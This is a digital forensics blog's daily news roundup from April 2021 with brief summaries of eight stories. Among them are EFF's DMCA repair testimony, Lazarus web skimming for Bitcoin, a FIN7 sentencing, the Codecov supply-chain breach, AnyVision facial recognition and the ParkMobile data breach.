AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets 04/21/2021

1 – EFF Will Tell Copyright Office That Consumers Should Have the Freedom to Fix, Modify Digital Devices They Own

On Tuesday, April 20, and Wednesday, April 21, experts from the Electronic Frontier Foundation (EFF) fighting copyright abuse will testify at virtual hearings held by the Copyright Office in favor of exemptions to the Digital Millennium Copyright Act (DMCA) so people who have purchased digital devices—from cameras and e-readers to smart TVs—can repair or modify them, or download new software to enhance their functionality. The online hearings are part of a rulemaking process held every three years by the Copyright Office to determine whether people are harmed by DMCA “anti-circumvention” provisions, which prohibit anyone from bypassing or disabling access controls built into products by manufacturers to lock down the software that runs them. These provisions are often abused by technology companies to control how their devices are used and stop consumers, innovators, competitors, researchers, and everyday repair businesses from offering new, lower-cost, and creative services.


2 – North Korean hackers adapt web skimming for stealing Bitcoin

Hackers linked with the North Korean government applied the web skimming technique to steal cryptocurrency in a previously undocumented campaign that started early last year, researchers say. The attacks compromised customers of at least three online stores and relied on infrastructure used for web skimming activities and attributed in the past to Lazarus APT, also known as Hidden Cobra. In research published last year, Dutch cyber-security company Sansec exposed Lazarus operations that had been going since 2019 to capture payment card data from online shoppers at large retailers in the U.S. and Europe. The malicious JavaScript code (also referred to as JS-sniffer or web skimmer) used in those attacks collected the payment card details that customers entered on the checkout page.


3 – Member of FIN7 Hacking Group Sentenced to US Prison

A Ukrainian national arrested for his role in a hacking group that compromised millions of financial accounts was sentenced to a decade in prison, US prosecutors said Friday. Fedir Hladyr, 35, had a high-level role as a manager and systems administrator for a hacking group known at FIN7, authorities said.

He was one of three Ukrainians arrested in mid-2018 for hacking more than 100 US companies and stealing millions of credit and debit card numbers, according to the Justice Department. “The defendant and his conspirators compromised millions of financial accounts and caused over a billion dollars in losses to Americans and costs to the US economy,” acting Assistant Attorney General Nicholas McQuaid said in a release. Hladyr was arrested in Germany, then extradited to Seattle where he pleaded guilty in 2019 to conspiring to commit computer hacking and wire fraud, according to authorities.


4 – 6 Cybersecurity Tips for Working from Home

Here at Tripwire, we, like many others, recently surpassed the one-year anniversary of working from home due to the COVID-19 pandemic. Since March of 2020, we have converted kitchens, spare bedrooms and garages into office spaces. Our pets and children have become our coworkers, and companies are reporting a sudden increase in shirt sales as opposed to pant sales. This unique transition has required flexibility to adapt to a new environment, and with that new environment has come a different set of security practices. Although many of us have finally established a rhythm when it comes to working from home, it is worth reminding ourselves of some important security practices every remote employee should be implementing.


5 – Hundreds of networks reportedly hacked in Codecov supply-chain attack

More details have emerged on the recent Codecov system breach which is now being likened to the SolarWinds hack. In new reporting by Reuters, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov’s systems. As reported by BleepingComputer last week, Codecov had suffered a supply-chain attack that went undetected for over 2-months. In this attack, threat actors had gained Codecov’s credentials from their flawed Docker image that the actors then used to alter Codecov’s Bash Uploader script, used by the company’s clients. By replacing Codecov’s IP address with their own in the Bash Uploader script, the attackers paved a way to silently collect Codecov 

customers’ credentials—tokens, API keys, and anything stored as environment variables in the customers’ continuous integration (CI) environments. Codecov is an online software testing platform that can be integrated with your GitHub projects, to generate code coverage reports and statistics, which is why it is favored by over 29,000 enterprises building software.


6 – Reddit introduces its Clubhouse clone because it’s 2021 and that’s what we do now

If you’re a social network, you have to have a Clubhouse clone on your platform. I don’t make the rules. Reddit is the latest to join the fold, and announced a live audio product last night. The product is called Reddit Talk, and it lets you voice chat with other folks on your subreddit in real-time. However, it’s currently in the test phase and you have to register your interest through a waitlist if you want to try it out. The functionality of the feature is akin to Clubhouse in terms of creating rooms and joining them with Twitter Spaces-inspired emoji reactions thrown in. Reddit’s product manager, Peter Yang, noted that this product is different because the platform’s pseudo-anonymous nature allows users to have more authentic conversations. However, that’s true for Twitter and Discord as well.


7 – Why a U.S. hospital and oil company turned to facial recognition

Deployments of facial recognition from Israeli startup AnyVision show how the surveillance software has gained adoption across the United States even as regulatory and ethical debates about it rage. The technology finds certain faces in photos or videos, with banks representing one sector that has taken interest in systems from AnyVision or its many competitors to improve security and service. Organizations in other industries are chasing similar goals. The Los Angeles hospital Cedars-Sinai and oil giant BP Plc (BP.L) are among several previously unreported users of AnyVision. Cedars-Sinai’s main hospital uses AnyVision facial recognition to give staff a heads-up about individuals known for violence, drug fraud or using different names at the emergency room, three sources said. Cedars said it “does not publicly discuss our security programs” and could not confirm the information.


8 – ParkMobile Breach Exposes License Plate Data, Mobile Numbers of 21M Users

Someone is selling account information for 21 million customers of ParkMobile, a mobile parking app that’s popular in North America. The stolen data includes customer email addresses, dates of birth, phone numbers, license plate numbers, hashed passwords and mailing addresses.  KrebsOnSecurity first heard about the breach from Gemini Advisory, a New York City based threat intelligence firm that keeps a close eye on the cybercrime forums. Gemini shared a new sales thread on a Russian-language crime forum that included my ParkMobile account information in the accompanying screenshot of the stolen data. Included in the data were my email address and phone number, as well as license plate numbers for four different vehicles we have used over the past decade. Asked about the sales thread, Atlanta-based ParkMobile said the company published a notification on Mar. 26 about “a cybersecurity incident linked to a vulnerability in a third-party software that we use.”

Related Posts